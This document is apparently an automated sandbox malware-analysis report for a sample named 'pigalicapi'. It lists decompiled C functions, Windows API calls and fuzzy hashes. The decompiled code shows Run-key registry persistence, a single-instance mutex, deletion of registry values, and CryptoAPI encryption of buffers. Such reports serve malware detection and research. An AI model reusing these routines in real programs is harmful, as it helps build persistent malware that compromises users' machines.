                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005BF6
                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 04005C2A
                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 04005C59
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005C9E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtuallstrlen$lstrcpyn
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 808621155-0
                                                                                                                                                                                                                                                                          • Opcode ID: 87716a91232c7d4b55081c1f55d7f64912373dfad697bd4087df7a6950954879
                                                                                                                                                                                                                                                                          • Instruction ID: 5a59fe48962482dc997a37d5c0ed7d0013e253906576cb4b19edba68c8a08fb2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87716a91232c7d4b55081c1f55d7f64912373dfad697bd4087df7a6950954879
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D451C774904209EFEB04CF94C998BEEBBB5EF48305F148559E505B7284D379AA80CFA5
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04006CF0() {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                                                                                                          				long _t21;
                                                                                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                                                                                          				char* _t26;
                                                                                                                                                                                                                                                                          				char* _t30;
                                                                                                                                                                                                                                                                          				char* _t32;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				_v12 = 0x80000001;
                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0x80000002;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                          				_t32 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          				_t21 = RegOpenKeyExA(_v12, _t32, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                          				if(_t21 == 0) {
                                                                                                                                                                                                                                                                          					_v24 = 0x20;
                                                                                                                                                                                                                                                                          					_v20 = 3;
                                                                                                                                                                                                                                                                          					_t30 =  *0x4011890; // 0x4013fa6
                                                                                                                                                                                                                                                                          					_t24 = RegQueryValueExA(_v16, _t30, 0,  &_v20,  &_v60,  &_v24); // executed
                                                                                                                                                                                                                                                                          					_v28 = _t24;
                                                                                                                                                                                                                                                                          					if(_v28 == 0) {
                                                                                                                                                                                                                                                                          						_v5 = 1;
                                                                                                                                                                                                                                                                          						_t26 =  *0x4011890; // 0x4013fa6
                                                                                                                                                                                                                                                                          						RegDeleteValueA(_v16, _t26);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					RegCloseKey(_v16);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                          0x04006cf6
                                                                                                                                                                                                                                                                          0x04006cfa
                                                                                                                                                                                                                                                                          0x04006d0a
                                                                                                                                                                                                                                                                          0x04006d0c
                                                                                                                                                                                                                                                                          0x04006d0c
                                                                                                                                                                                                                                                                          0x04006d13
                                                                                                                                                                                                                                                                          0x04006d25
                                                                                                                                                                                                                                                                          0x04006d30
                                                                                                                                                                                                                                                                          0x04006d38
                                                                                                                                                                                                                                                                          0x04006d3a
                                                                                                                                                                                                                                                                          0x04006d41
                                                                                                                                                                                                                                                                          0x04006d56
                                                                                                                                                                                                                                                                          0x04006d61
                                                                                                                                                                                                                                                                          0x04006d67
                                                                                                                                                                                                                                                                          0x04006d6e
                                                                                                                                                                                                                                                                          0x04006d70
                                                                                                                                                                                                                                                                          0x04006d74
                                                                                                                                                                                                                                                                          0x04006d7e
                                                                                                                                                                                                                                                                          0x04006d7e
                                                                                                                                                                                                                                                                          0x04006d88
                                                                                                                                                                                                                                                                          0x04006d88
                                                                                                                                                                                                                                                                          0x04006d94

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,04013B88,00000000,000F003F,00000000), ref: 04006D30
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,04013FA6,00000000,00000003,?,00000020), ref: 04006D61
                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,04013FA6), ref: 04006D7E
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04006D88
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 647993726-3916222277
                                                                                                                                                                                                                                                                          • Opcode ID: 7e3867fdce199c8a5bb6ff6aa161a31bc633291f878d7ee7a05f6acc28b5ac08
                                                                                                                                                                                                                                                                          • Instruction ID: 88112219bc8656018e8fd12fe99521312711d887651bf4d09d45951e100356d5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e3867fdce199c8a5bb6ff6aa161a31bc633291f878d7ee7a05f6acc28b5ac08
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE114275D04208AFEB04DFE0D848BBEBBB8FB48304F148158EA00BB280D77D5A45CBA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04008370(intOrPtr _a4, long _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                                                                          				intOrPtr* _v56;
                                                                                                                                                                                                                                                                          				long _v60;
                                                                                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a16 < _a8) {
                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_t79 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v16 = _t79;
                                                                                                                                                                                                                                                                          					_t80 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v12 = _t80;
                                                                                                                                                                                                                                                                          					if(_v16 != 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                          						_v24 = 0x1000;
                                                                                                                                                                                                                                                                          						_v20 = 0x1000;
                                                                                                                                                                                                                                                                          						_t85 = E04008800(_v16,  &_v24, _v12,  &_v20, 0x4013378, 0x94); // executed
                                                                                                                                                                                                                                                                          						if(_t85 != 0) {
                                                                                                                                                                                                                                                                          							_t21 = _a8 + 0x10; // 0x1010
                                                                                                                                                                                                                                                                          							_v28 = _v20 + _t21;
                                                                                                                                                                                                                                                                          							_t170 = _a16 - _v28;
                                                                                                                                                                                                                                                                          							if(_a16 >= _v28) {
                                                                                                                                                                                                                                                                          								_v40 = E04008770(_t170, 0xa);
                                                                                                                                                                                                                                                                          								_v36 = E040087D0(0xffffffff);
                                                                                                                                                                                                                                                                          								_t90 = VirtualAlloc(0, _a8, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          								_v32 = _t90;
                                                                                                                                                                                                                                                                          								if(_v32 != 0) {
                                                                                                                                                                                                                                                                          									_v44 = _a8;
                                                                                                                                                                                                                                                                          									E04007B70(_v32, _a4, _a8);
                                                                                                                                                                                                                                                                          									_t94 = E04008970(_v32,  &_v44, _v16, _v24); // executed
                                                                                                                                                                                                                                                                          									if(_t94 != 0) {
                                                                                                                                                                                                                                                                          										_v48 = _a12;
                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v40, 4);
                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v36, 4);
                                                                                                                                                                                                                                                                          										_v60 = 0;
                                                                                                                                                                                                                                                                          										_v56 = _v48;
                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v60, 4);
                                                                                                                                                                                                                                                                          										_v52 = _v48;
                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v20, 4);
                                                                                                                                                                                                                                                                          										E040085D0( &_v48, _v12, _v20);
                                                                                                                                                                                                                                                                          										E04008650(_v36, _v52, _v48 - _v52, _v36);
                                                                                                                                                                                                                                                                          										E040085D0( &_v48, _v32, _v44);
                                                                                                                                                                                                                                                                          										 *_v56 = E040016F0(_a12 + 0xc, _v48 - _a12 + 0xc);
                                                                                                                                                                                                                                                                          										_v8 = _v48 - _a12;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									VirtualFree(_v32, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v16 != 0) {
                                                                                                                                                                                                                                                                          						VirtualFree(_v16, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                                                                          0x04008376
                                                                                                                                                                                                                                                                          0x04008381
                                                                                                                                                                                                                                                                          0x040085c0
                                                                                                                                                                                                                                                                          0x040085c6
                                                                                                                                                                                                                                                                          0x040083b1
                                                                                                                                                                                                                                                                          0x040083bf
                                                                                                                                                                                                                                                                          0x040083c5
                                                                                                                                                                                                                                                                          0x040083d6
                                                                                                                                                                                                                                                                          0x040083dc
                                                                                                                                                                                                                                                                          0x040083e3
                                                                                                                                                                                                                                                                          0x040083f3
                                                                                                                                                                                                                                                                          0x040083fa
                                                                                                                                                                                                                                                                          0x0400841b
                                                                                                                                                                                                                                                                          0x04008425
                                                                                                                                                                                                                                                                          0x04008431
                                                                                                                                                                                                                                                                          0x04008435
                                                                                                                                                                                                                                                                          0x0400843b
                                                                                                                                                                                                                                                                          0x0400843e
                                                                                                                                                                                                                                                                          0x0400844e
                                                                                                                                                                                                                                                                          0x0400845b
                                                                                                                                                                                                                                                                          0x0400846b
                                                                                                                                                                                                                                                                          0x04008471
                                                                                                                                                                                                                                                                          0x04008478
                                                                                                                                                                                                                                                                          0x04008481
                                                                                                                                                                                                                                                                          0x04008490
                                                                                                                                                                                                                                                                          0x040084a8
                                                                                                                                                                                                                                                                          0x040084b2
                                                                                                                                                                                                                                                                          0x040084bb
                                                                                                                                                                                                                                                                          0x040084c8
                                                                                                                                                                                                                                                                          0x040084da
                                                                                                                                                                                                                                                                          0x040084e2
                                                                                                                                                                                                                                                                          0x040084ec
                                                                                                                                                                                                                                                                          0x040084f9
                                                                                                                                                                                                                                                                          0x04008504
                                                                                                                                                                                                                                                                          0x04008511
                                                                                                                                                                                                                                                                          0x04008525
                                                                                                                                                                                                                                                                          0x0400853c
                                                                                                                                                                                                                                                                          0x04008550
                                                                                                                                                                                                                                                                          0x04008576
                                                                                                                                                                                                                                                                          0x0400857e
                                                                                                                                                                                                                                                                          0x0400857e
                                                                                                                                                                                                                                                                          0x0400858c
                                                                                                                                                                                                                                                                          0x0400858c
                                                                                                                                                                                                                                                                          0x04008478
                                                                                                                                                                                                                                                                          0x0400843e
                                                                                                                                                                                                                                                                          0x04008425
                                                                                                                                                                                                                                                                          0x04008596
                                                                                                                                                                                                                                                                          0x040085a3
                                                                                                                                                                                                                                                                          0x040085a3
                                                                                                                                                                                                                                                                          0x040085ad
                                                                                                                                                                                                                                                                          0x040085ba
                                                                                                                                                                                                                                                                          0x040085ba
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040085ad

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 040083BF
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 040083D6
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0400846B
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 040089BF
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: GetLastError.KERNEL32 ref: 040089C9
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 040089F8
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008A1F
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 04008A41
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptDestroyKey.ADVAPI32(00000000), ref: 04008A4E
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008A5A
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400858C
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040085A3
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040085BA
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,04008420,00000000,00001000,00000000), ref: 0400883B
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: GetLastError.KERNEL32 ref: 04008845
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008874
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 040088AF
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 040088CF
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 0400890C
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 0400892A
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptDestroyKey.ADVAPI32(?), ref: 04008937
                                                                                                                                                                                                                                                                            • Part of subcall function 040087D0: QueryPerformanceCounter.KERNEL32(?), ref: 040087E7
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Virtual$Context$Acquire$AllocFree$DestroyErrorExportImportLast$CounterEncryptPerformanceQueryRelease
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 487564122-0
                                                                                                                                                                                                                                                                          • Opcode ID: cd64014fca8a1fd3dedaf543264f396e97ee9f29ef2d2d9375146d60c3b71fee
                                                                                                                                                                                                                                                                          • Instruction ID: 75e4ec9ffd75ad85335d37f2dbfda6536f989acb89096578b4a6032df118288e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd64014fca8a1fd3dedaf543264f396e97ee9f29ef2d2d9375146d60c3b71fee
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0711CB6D00208ABEB14EFA4D845FEEB7B4BB48305F14C519EA15B72C0E774EA44CB65
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040012D0(CHAR* _a4) {
                                                                                                                                                                                                                                                                          				CHAR* _v8;
                                                                                                                                                                                                                                                                          				char* _v12;
                                                                                                                                                                                                                                                                          				CHAR* _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                          				long _t26;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                                                                          					_v16 = _v8;
                                                                                                                                                                                                                                                                          					_v12 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                          					while( *0x4014370 == 0) {
                                                                                                                                                                                                                                                                          						_v20 = 0x80000001;
                                                                                                                                                                                                                                                                          						if(( *(_v8 + 0x30c) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          							_v20 = 0x80000002;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                          						_t26 = RegOpenKeyExA(_v20, _v12, 0, 0xf003f,  &_v24); // executed
                                                                                                                                                                                                                                                                          						if(_t26 == 0) {
                                                                                                                                                                                                                                                                          							_v28 = lstrlenA(_v16);
                                                                                                                                                                                                                                                                          							RegSetValueExA(_v24, _v8 + 0x208, 0, 1, _v16, _v28); // executed
                                                                                                                                                                                                                                                                          							RegCloseKey(_v24);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                          0x040012d9
                                                                                                                                                                                                                                                                          0x040012e0
                                                                                                                                                                                                                                                                          0x040012e9
                                                                                                                                                                                                                                                                          0x040012ec
                                                                                                                                                                                                                                                                          0x040012f3
                                                                                                                                                                                                                                                                          0x04001301
                                                                                                                                                                                                                                                                          0x04001314
                                                                                                                                                                                                                                                                          0x04001316
                                                                                                                                                                                                                                                                          0x04001316
                                                                                                                                                                                                                                                                          0x0400131d
                                                                                                                                                                                                                                                                          0x04001337
                                                                                                                                                                                                                                                                          0x0400133f
                                                                                                                                                                                                                                                                          0x0400134b
                                                                                                                                                                                                                                                                          0x04001368
                                                                                                                                                                                                                                                                          0x04001372
                                                                                                                                                                                                                                                                          0x04001372
                                                                                                                                                                                                                                                                          0x0400137d
                                                                                                                                                                                                                                                                          0x0400137d
                                                                                                                                                                                                                                                                          0x040012fc
                                                                                                                                                                                                                                                                          0x0400138d

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,0400C248,00000000,000F003F,00000000), ref: 04001337
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 04001345
                                                                                                                                                                                                                                                                          • RegSetValueExA.KERNELBASE(00000000,-00000208,00000000,00000001,?,?), ref: 04001368
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04001372
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 0400137D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseOpenSleepValuelstrlen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3411147897-0
                                                                                                                                                                                                                                                                          • Opcode ID: 938b7cb6186ad2cb83b89a2b0749dbfdb9b9446470f7ced15d3d2a40044d04a4
                                                                                                                                                                                                                                                                          • Instruction ID: 889d750eda8961b126f00a9021e235014b30ece64fb5bfebafecfaf2f158f27d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 938b7cb6186ad2cb83b89a2b0749dbfdb9b9446470f7ced15d3d2a40044d04a4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12210070A04309EBEB04CFE4C949BAEB7B4FB44301F108258E641BB280D779AE40DB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 100021F9
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 1000223B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.606973844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorHugeLastRead
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3239643929-0
                                                                                                                                                                                                                                                                          • Opcode ID: 85b49708b7b006b8dd60775e5bc00b257713ffe4475079b25aab955e2dacc848
                                                                                                                                                                                                                                                                          • Instruction ID: c08fe1bd30c15a7bb6e8476d185febfb1ca0f6f7539b963f039c2b10503cc3e6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85b49708b7b006b8dd60775e5bc00b257713ffe4475079b25aab955e2dacc848
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB818574A00209EFDB04CF94C890B9EBBB5FF88354F248198E959AB355D774EE81CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005E00() {
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				CreateMutexA(0, 0, "pigalicapi"); // executed
                                                                                                                                                                                                                                                                          				return 0 | GetLastError() == 0x000000b7;
                                                                                                                                                                                                                                                                          			}



                                                                                                                                                                                                                                                                          0x04005e0c
                                                                                                                                                                                                                                                                          0x04005e25

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,04003BEB), ref: 04005E0C
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,04003BEB), ref: 04005E12
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                          • String ID: pigalicapi
                                                                                                                                                                                                                                                                          • API String ID: 1925916568-2184165135
                                                                                                                                                                                                                                                                          • Opcode ID: ac3ade5f6374e6b3d28c260e8624ddfb09fc106c0a6a63d5b6af1bc4c66bd4e9
                                                                                                                                                                                                                                                                          • Instruction ID: c9a096dff23d34124f73a3e8575822b5ba186ec69b5811b6053c60030017a183
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac3ade5f6374e6b3d28c260e8624ddfb09fc106c0a6a63d5b6af1bc4c66bd4e9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAC08C362883186BF2081B61ED4BB893A88C792E81F600030F30AEA0D0999968C08B16
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04008250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				signed int _v13;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                                                                          				char* _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				intOrPtr _v44;
